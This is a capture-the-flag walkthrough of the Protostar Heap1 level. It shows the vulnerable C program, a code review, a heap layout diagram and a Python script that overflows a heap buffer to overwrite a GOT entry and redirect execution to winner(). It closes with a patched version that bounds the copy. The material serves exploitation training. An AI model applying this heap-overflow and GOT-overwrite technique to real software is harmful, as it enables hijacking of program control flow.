Binary Exploitation Protostar Heap1 - Walkthrough - writeups

Hello guys,

Welcome back to my blog. Today I am going to share my walkthrough of the Exploit-Exercises Protostar Heap1 level.

In this level, our task is to execute the winner function through a heap overflow.

Before starting the walkthrough, let's take a look at the hints and details.

Note: I want to highlight a few points.

  • I'm not the creator of the Protostar war game. I am just a player.
  • I am only providing hints and references here, so that if you feel stuck anywhere you can take a look.
  • Understand all previous levels before starting this one.
  • Do some research on assembly, C/C++ and gdb.
  • Do some research on heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

  

struct internet {
  int priority;
  char *name;
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}

Hint

This level takes a look at code flow hijacking in data overwrite cases.

This level is at /opt/protostar/bin/heap1

Code Review

struct internet {
  int priority;
  char *name;              /* Note that this is a pointer: it takes only 4 bytes and points to another location */
};


void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;        /* Create three pointers to struct internet */

  i1 = malloc(sizeof(struct internet)); /* Allocate space for the first struct internet */
  i1->priority = 1;                     /* Set the priority */
  i1->name = malloc(8);                 /* Allocate a separate 8-byte buffer for the char pointer */

  i2 = malloc(sizeof(struct internet)); /* Allocate space for the second struct internet */
  i2->priority = 2;                     /* Set the priority */
  i2->name = malloc(8);                 /* Allocate a separate 8-byte buffer for the char pointer */

  strcpy(i1->name, argv[1]);            /* Copy argv[1] to wherever i1->name points, with no length check */
  strcpy(i2->name, argv[2]);            /* Copy argv[2] to wherever i2->name points, with no length check */

  printf("and that's a wrap folks!\n");
}

Planning

  Heap Overview

                    |>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
  -----------------------------------------------------------------------------------------------------------
 | i1 ( Name, Char Pointer ) | Paddings and Other Stuff | i2 ( Name, Char Pointer ) |  Name (8) |  Name (8) |
 ------------------------------------------------------------------------------------------------------------
                                                                          |>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
                    
                    
We just need to overwrite the char pointer of i2. When the second strcpy copies data from the argument, it reads the name pointer of i2 to find out where to write. Because we have already overwritten that pointer by overflowing the first name buffer, strcpy writes argv[2] to the address we chose, which here is an entry in the GOT.

  Overflow name and write data to the FP

Exploit

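import struct

# Python 2 script: str is a byte string and print is a statement.

# 20 filler bytes to get from the start of i1->name to i2's name pointer
buf = "\x90"*4*5

# Address of the puts entry in the global offset table (GOT)
puts_glob = 0x08049774

# Value to overwrite the puts entry with: the winner function
win = 0x08048494

payload = ''
payload += buf
payload += struct.pack("I", puts_glob)  # lands on i2->name
payload += " "                          # separates argv[1] from argv[2]
payload += struct.pack("I", win)        # argv[2], written to the address now in i2->name
print payload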
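
The overwrite is possible only because strcpy copies argv[1] into an 8-byte buffer without checking its length. As an added example (not part of the original post or the Protostar source), here is the same program with a bounded copy; entry_new, entry_set_name and NAME_CAP are names made up for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_CAP 8  /* same buffer size as heap1's malloc(8) */

struct internet {
  int priority;
  char *name;
};

/* Allocate an entry and its zeroed name buffer; NULL on allocation failure. */
static struct internet *entry_new(int priority)
{
  struct internet *e = malloc(sizeof(*e));
  if (e == NULL) return NULL;
  e->priority = priority;
  e->name = calloc(1, NAME_CAP);
  if (e->name == NULL) { free(e); return NULL; }
  return e;
}

/* Bounded replacement for strcpy(e->name, src). Input that does not fit
   (terminator included) is refused, so nothing past the buffer is written. */
static int entry_set_name(struct internet *e, const char *src)
{
  if (e == NULL || src == NULL) return -1;
  const char *end = memchr(src, '\0', NAME_CAP);
  if (end == NULL) return -1;  /* no terminator within NAME_CAP bytes */
  memcpy(e->name, src, (size_t)(end - src) + 1);
  return 0;
}

int main(int argc, char **argv)
{
  if (argc != 3) {  /* heap1 never checks argc before using argv[1], argv[2] */
    fprintf(stderr, "usage: heap1 name1 name2\n");
    return 2;
  }
  struct internet *i1 = entry_new(1), *i2 = entry_new(2);
  if (i1 == NULL || i2 == NULL) return 1;
  if (entry_set_name(i1, argv[1]) != 0 || entry_set_name(i2, argv[2]) != 0) {
    fprintf(stderr, "name too long (max %d bytes)\n", NAME_CAP - 1);
    return 1;
  }
  printf("and that's a wrap folks!\n");
  free(i1->name); free(i1); free(i2->name); free(i2);
  return 0;
}
```

With this version an oversized first argument is rejected before any byte is copied, so the name pointer of i2 keeps the value malloc gave it.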

For a more detailed walkthrough, check the YouTube video playlist provided below.


